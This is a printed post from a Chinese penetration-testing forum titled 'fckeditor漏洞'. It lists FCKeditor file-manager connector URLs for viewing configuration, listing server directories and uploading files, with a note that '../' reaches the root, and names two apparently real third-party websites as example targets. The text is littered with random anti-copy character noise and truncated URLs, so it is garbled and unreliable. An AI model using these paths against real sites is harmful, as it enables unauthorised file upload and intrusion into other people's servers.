中国网络渗透测试联盟

标题: fckeditor漏洞 [打印本页]
作者: admin    时间: 2012-9-13 17:02
标题: fckeditor漏洞
# Z1 m8 Y7 J4 |/ ~2 n% ~
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
! o- h; j* ^5 M9 j! Ahttp://www.china-photo-model.com ... aspx/connector.aspx2 M- g5 \- D/ X/ b9 \4 w1 w

# [8 E6 \2 I( @5 r$ T& F2 H( E4 p' x6 q# V6 @3 z9 P! e3 p
http://yeni.kadikoy.bel.tr/globa ... ctors/jsp/connector
$ }* e8 W( S( U* Q
, _# z" i1 d) G- r: C: K9 J/ d8 X! V/ V3 o" g: ]

$ j3 a; k) D( \; I
3 U4 H# Q9 k3 }- K1 c
% W+ S+ W9 n$ ~; `9 ^4 O  w3 Y查看配置和列出目录下的文件.
. t: @6 R% Y/ {0 H' F% }+ W* T$ d! j- O+ K+ g- Q
9 b8 C! @! o7 ]4 _
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
+ l; j1 T& y. e9 X$ ihttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F" j, |9 |9 \- C5 N; m4 m/ D

4 L6 Q8 s9 ~6 |- Y' R, p; m$ s上传地址:6 t0 O5 d- r. J# j9 u

3 ?4 _4 I5 ^1 yhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F# S: k, q: R1 b; p7 U2 d1 P
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector    ../为根目录



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2